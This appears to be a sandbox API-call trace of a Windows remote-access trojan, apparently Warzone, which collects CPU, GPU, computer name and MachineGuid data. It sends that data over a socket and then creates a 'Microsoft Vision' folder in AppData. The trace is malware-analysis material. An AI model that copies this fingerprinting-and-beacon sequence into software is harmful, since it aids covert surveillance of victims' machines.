[0190.895] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fcc0 | out: hHeap=0x900000) returned 1 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fca8 | out: hHeap=0x900000) returned 1 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fc90 | out: hHeap=0x900000) returned 1 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fd38 | out: hHeap=0x900000) returned 1 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92f9f0 | out: hHeap=0x900000) returned 1 [0190.895] GetProcessHeap () returned 0x900000 [0190.895] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92f9f0 [0190.895] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fd38 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x92fc90 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fca8 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fcc0 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fca8 | out: hHeap=0x900000) returned 1 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fc90 | out: hHeap=0x900000) returned 1 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fd38 | out: hHeap=0x900000) returned 1 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xc) returned 0x92fd38 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92f9f0 | out: hHeap=0x900000) returned 1 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x92fcc0 | out: hHeap=0x900000) returned 1 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x0) returned 0x9347a8 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x9347d8 [0190.896] GetProcessHeap () returned 0x900000 [0190.896] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x200) returned 0x932448 [0190.897] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.897] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.897] VirtualAlloc (lpAddress=0x0, dwSize=0x27, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0190.897] lstrcpyA (in: lpString1=0x2cd0000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0190.897] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.897] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2cd0000, cbMultiByte=41, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0190.898] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0190.898] lstrlenA (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.898] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2cd0000, cbMultiByte=-1, lpWideCharStr=0x2ce0000, cchWideChar=82 | out: lpWideCharStr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 40 [0190.898] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.898] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0190.898] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.898] lstrcpyW (in: lpString1=0x2cf0000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0190.899] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0190.899] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2d00000 [0190.899] lstrcpyW (in: lpString1=0x2d00000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0190.899] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.899] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.900] VirtualFree (lpAddress=0x2cd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.900] GetProcessHeap () returned 0x900000 [0190.900] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x932448 | out: hHeap=0x900000) returned 1 [0190.900] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0190.909] CoInitialize (pvReserved=0x0) returned 0x1 [0190.909] CoCreateInstance (in: rclsid=0x413480*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x17, riid=0x415d20*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x33f114 | out: ppv=0x33f114*=0x34b0828) returned 0x0 [0191.527] WbemLocator:IWbemLocator:ConnectServer (in: This=0x34b0828, strNetworkResource="root\\CIMV2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=128, strAuthority=0x0, pCtx=0x0, ppNamespace=0x33f108 | out: ppNamespace=0x33f108*=0x34bcfe4) returned 0x0 [0197.986] IWbemServices:ExecQuery (in: This=0x34bcfe4, strQueryLanguage="", strQuery="", lFlags=32, pCtx=0x0, ppEnum=0x33f10c | out: ppEnum=0x33f10c*=0x34bc754) returned 0x0 [0198.047] IEnumWbemClassObject:Next (in: This=0x34bc754, lTimeout=-1, uCount=0x1, apObjects=0x33f110, puReturned=0x33f104 | out: apObjects=0x33f110*=0x34bcff8, puReturned=0x33f104*=0x1) returned 0x0 [0198.052] IWbemClassObject:Get (in: This=0x34bcff8, wszName="Name", lFlags=0, pVal=0x33f0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x33f0f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="NVIDIA GeForce 7600 GT", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0198.060] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.068] VirtualAlloc (lpAddress=0x0, dwSize=0x2e, flAllocationType=0x3000, flProtect=0x4) returned 0x2cd0000 [0198.078] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.078] lstrcpyW (in: lpString1=0x2cd0000, lpString2="NVIDIA GeForce 7600 GT" | out: lpString1="NVIDIA GeForce 7600 GT") returned="NVIDIA GeForce 7600 GT" [0198.085] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x33f338, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe")) returned 0x3c [0198.359] GetProcessHeap () returned 0x900000 [0198.363] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x400000) returned 0x3840020 [0198.372] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.381] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb7400 [0198.381] ReadFile (in: hFile=0x28c, lpBuffer=0x3840020, nNumberOfBytesToRead=0xb7400, lpNumberOfBytesRead=0x33f114, lpOverlapped=0x0 | out: lpBuffer=0x3840020*, lpNumberOfBytesRead=0x33f114*=0xb7400, lpOverlapped=0x0) returned 1 [0198.524] CloseHandle (hObject=0x28c) returned 1 [0198.525] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.525] VirtualAlloc (lpAddress=0x0, dwSize=0x2e, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0198.525] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.526] lstrcpyW (in: lpString1=0x2ce0000, lpString2="NVIDIA GeForce 7600 GT" | out: lpString1="NVIDIA GeForce 7600 GT") returned="NVIDIA GeForce 7600 GT" [0198.526] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0198.526] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2cf0000 [0198.526] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0198.526] lstrcpyW (in: lpString1=0x2cf0000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0198.526] GlobalMemoryStatusEx (in: lpBuffer=0x33f0d0 | out: lpBuffer=0x33f0d0) returned 1 [0198.526] lstrlenW (lpString="") returned 0 [0198.526] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2d10000 [0198.527] lstrlenW (lpString="") returned 0 [0198.527] lstrcpyW (in: lpString1=0x2d10000, lpString2="" | out: lpString1="") returned="" [0198.527] GetComputerNameW (in: lpBuffer=0x33f0dc, nSize=0x33f0fc | out: lpBuffer="XDUWTFONO", nSize=0x33f0fc) returned 1 [0198.527] lstrlenW (lpString="XDUWTFONO") returned 9 [0198.527] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2d20000 [0198.527] lstrlenW (lpString="XDUWTFONO") returned 9 [0198.527] lstrcpyW (in: lpString1=0x2d20000, lpString2="XDUWTFONO" | out: lpString1="XDUWTFONO") returned="XDUWTFONO" [0198.527] GetCurrentProcess () returned 0xffffffff [0198.540] GetModuleHandleA (lpModuleName="kernel32") returned 0x76210000 [0198.540] GetProcAddress (hModule=0x76210000, lpProcName="IsWow64Process") returned 0x7622195e [0198.540] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x33f0f0 | out: Wow64Process=0x33f0f0) returned 1 [0198.540] GetCurrentProcess () returned 0xffffffff [0198.540] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x33f0f8 | out: TokenHandle=0x33f0f8*=0x28c) returned 1 [0198.540] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x14, TokenInformation=0x33f0f0, TokenInformationLength=0x4, ReturnLength=0x33f0f4 | out: TokenInformation=0x33f0f0, ReturnLength=0x33f0f4) returned 1 [0198.540] CloseHandle (hObject=0x28c) returned 1 [0198.540] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76fa0000 [0198.541] GetProcAddress (hModule=0x76fa0000, lpProcName="RtlGetVersion") returned 0x76fd873a [0198.541] RtlGetVersion (in: lpVersionInformation=0x33efdc | out: lpVersionInformation=0x33efdc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0198.541] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31 [0198.541] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0198.541] lstrlenW (lpString="SOFTWARE\\Microsoft\\Cryptography") returned 31 [0198.541] lstrcpyW (in: lpString1=0x2d30000, lpString2="SOFTWARE\\Microsoft\\Cryptography" | out: lpString1="SOFTWARE\\Microsoft\\Cryptography") returned="SOFTWARE\\Microsoft\\Cryptography" [0198.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x33f0e4 | out: phkResult=0x33f0e4*=0x28c) returned 0x0 [0198.542] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.542] lstrlenW (lpString="MachineGuid") returned 11 [0198.542] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0198.542] lstrlenW (lpString="MachineGuid") returned 11 [0198.542] lstrcpyW (in: lpString1=0x2d30000, lpString2="MachineGuid" | out: lpString1="MachineGuid") returned="MachineGuid" [0198.542] RegQueryValueExW (in: hKey=0x28c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x33f0b0, lpData=0x0, lpcbData=0x33f0b4*=0x0 | out: lpType=0x33f0b0*=0x1, lpData=0x0, lpcbData=0x33f0b4*=0x4a) returned 0x0 [0198.542] GetProcessHeap () returned 0x900000 [0198.542] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a) returned 0x95f688 [0198.542] RegQueryValueExW (in: hKey=0x28c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x33f0b0, lpData=0x95f688, lpcbData=0x33f0b4*=0x4a | out: lpType=0x33f0b0*=0x1, lpData="0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpcbData=0x33f0b4*=0x4a) returned 0x0 [0198.543] GetProcessHeap () returned 0x900000 [0198.543] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4a) returned 0x95f790 [0198.543] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.543] RegCloseKey (hKey=0x28c) returned 0x0 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960670 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960650 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960670 | out: hHeap=0x900000) returned 1 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960670 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x95f790 | out: hHeap=0x900000) returned 1 [0198.555] GetProcessHeap () returned 0x900000 [0198.555] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960690 [0198.555] lstrlenW (lpString="XDUWTFONO") returned 9 [0198.555] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2d30000 [0198.556] lstrcpyW (in: lpString1=0x2d30000, lpString2="XDUWTFONO" | out: lpString1="XDUWTFONO") returned="XDUWTFONO" [0198.556] lstrlenW (lpString="") returned 0 [0198.556] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2d40000 [0198.556] lstrcpyW (in: lpString1=0x2d40000, lpString2="" | out: lpString1="") returned="" [0198.556] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0198.556] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2d50000 [0198.556] lstrcpyW (in: lpString1=0x2d50000, lpString2="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" | out: lpString1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz" [0198.556] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.557] VirtualAlloc (lpAddress=0x0, dwSize=0x2e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d60000 [0198.557] lstrcpyW (in: lpString1=0x2d60000, lpString2="NVIDIA GeForce 7600 GT" | out: lpString1="NVIDIA GeForce 7600 GT") returned="NVIDIA GeForce 7600 GT" [0198.557] GetProcessHeap () returned 0x900000 [0198.557] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960650 | out: hHeap=0x900000) returned 1 [0198.557] VirtualFree (lpAddress=0x2d20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.558] VirtualFree (lpAddress=0x2d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.558] VirtualFree (lpAddress=0x2cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.558] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.598] GetProcessHeap () returned 0x900000 [0198.598] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x14) returned 0x960650 [0198.601] GetProcessHeap () returned 0x900000 [0198.601] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x960650, Size=0x18) returned 0x9606f0 [0198.610] GetProcessHeap () returned 0x900000 [0198.610] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x9606f0, Size=0x1c) returned 0x96eb10 [0198.610] GetProcessHeap () returned 0x900000 [0198.610] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96eb10, Size=0x20) returned 0x96eb38 [0198.610] GetProcessHeap () returned 0x900000 [0198.610] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96eb38, Size=0x24) returned 0x93a108 [0198.610] lstrlenW (lpString="XDUWTFONO") returned 9 [0198.610] GetProcessHeap () returned 0x900000 [0198.610] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x93a108, Size=0x28) returned 0x93a138 [0198.610] lstrlenW (lpString="XDUWTFONO") returned 9 [0198.610] GetProcessHeap () returned 0x900000 [0198.614] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x93a138, Size=0x3c) returned 0x961c38 [0198.614] lstrlenW (lpString="") returned 0 [0198.614] GetProcessHeap () returned 0x900000 [0198.614] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x961c38, Size=0x40) returned 0x961c80 [0198.617] lstrlenW (lpString="") returned 0 [0198.617] GetProcessHeap () returned 0x900000 [0198.617] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x961c80, Size=0x42) returned 0x96f328 [0198.617] GetProcessHeap () returned 0x900000 [0198.617] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96f328, Size=0x46) returned 0x96f378 [0198.620] GetProcessHeap () returned 0x900000 [0198.620] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96f378, Size=0x4a) returned 0x95f790 [0198.620] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0198.620] GetProcessHeap () returned 0x900000 [0198.623] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x95f790, Size=0x4e) returned 0x95f7e8 [0198.623] lstrlenW (lpString="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 39 [0198.623] GetProcessHeap () returned 0x900000 [0198.623] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x95f7e8, Size=0x9e) returned 0x96ce78 [0198.630] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.630] GetProcessHeap () returned 0x900000 [0198.630] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96ce78, Size=0xa2) returned 0x96ce78 [0198.630] lstrlenW (lpString="NVIDIA GeForce 7600 GT") returned 22 [0198.630] GetProcessHeap () returned 0x900000 [0198.633] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96ce78, Size=0xd0) returned 0x9705e8 [0198.633] GetProcessHeap () returned 0x900000 [0198.633] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x4) returned 0x934878 [0198.633] GetProcessHeap () returned 0x900000 [0198.633] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934878, Size=0x8) returned 0x934958 [0198.633] GetProcessHeap () returned 0x900000 [0198.633] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x934958, Size=0xc) returned 0x96e748 [0198.633] GetProcessHeap () returned 0x900000 [0198.633] RtlReAllocateHeap (Heap=0x900000, Flags=0x0, Ptr=0x96e748, Size=0xdc) returned 0x9706c0 [0198.633] GetProcessHeap () returned 0x900000 [0198.633] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xdc) returned 0x9707a8 [0198.633] GetProcessHeap () returned 0x900000 [0198.634] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9705e8 | out: hHeap=0x900000) returned 1 [0198.634] GetProcessHeap () returned 0x900000 [0198.634] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9706c0 | out: hHeap=0x900000) returned 1 [0198.636] lstrlenA (lpString="warzone160") returned 10 [0198.636] lstrlenA (lpString="warzone160") returned 10 [0198.636] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0198.641] lstrcpyA (in: lpString1=0x2ce0000, lpString2="warzone160" | out: lpString1="warzone160") returned="warzone160" [0198.643] lstrlenA (lpString="warzone160") returned 10 [0198.643] GetProcessHeap () returned 0x900000 [0198.643] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e748 [0198.643] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.647] GetProcessHeap () returned 0x900000 [0198.647] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xdc) returned 0x9705e8 [0198.647] GetProcessHeap () returned 0x900000 [0198.647] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xb) returned 0x96e760 [0198.653] GetProcessHeap () returned 0x900000 [0198.653] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xdc) returned 0x970890 [0198.653] GetProcessHeap () returned 0x900000 [0198.653] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0xdc) returned 0x970978 [0198.653] GetProcessHeap () returned 0x900000 [0198.654] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970890 | out: hHeap=0x900000) returned 1 [0198.657] GetProcessHeap () returned 0x900000 [0198.657] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e760 | out: hHeap=0x900000) returned 1 [0198.657] GetProcessHeap () returned 0x900000 [0198.657] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9705e8 | out: hHeap=0x900000) returned 1 [0198.657] send (s=0x228, buf=0x970978*, len=220, flags=0) returned 220 [0198.660] GetProcessHeap () returned 0x900000 [0198.660] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x970978 | out: hHeap=0x900000) returned 1 [0198.661] GetProcessHeap () returned 0x900000 [0198.661] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x96e748 | out: hHeap=0x900000) returned 1 [0198.661] GetProcessHeap () returned 0x900000 [0198.661] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x9707a8 | out: hHeap=0x900000) returned 1 [0198.661] VirtualFree (lpAddress=0x2d60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.667] VirtualFree (lpAddress=0x2d50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.680] VirtualFree (lpAddress=0x2d40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.682] VirtualFree (lpAddress=0x2d30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.687] GetProcessHeap () returned 0x900000 [0198.687] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x960690 | out: hHeap=0x900000) returned 1 [0198.687] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x33f130 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0198.687] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0198.687] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft vision"), lpSecurityAttributes=0x0) returned 0 [0198.700] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0198.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x407551, lpParameter=0x54c0e0, dwCreationFlags=0x0, lpThreadId=0x54cb58 | out: lpThreadId=0x54cb58*=0x620) returned 0x28c [0198.878] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x33eed0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0198.878] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0198.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned 61 [0198.878] VirtualAlloc (lpAddress=0x0, dwSize=0x7c, flAllocationType=0x3000, flProtect=0x4) returned 0x2ce0000 [0198.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned 61 [0198.878] lstrcpyW (in: lpString1=0x2ce0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0198.878] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned 61 [0198.878] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d10000 [0198.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\" [0198.879] VirtualFree (lpAddress=0x2ce0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.879] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Vision\\") returned 61 [0198.879] GetProcessHeap () returned 0x900000 [0198.879] RtlAllocateHeap 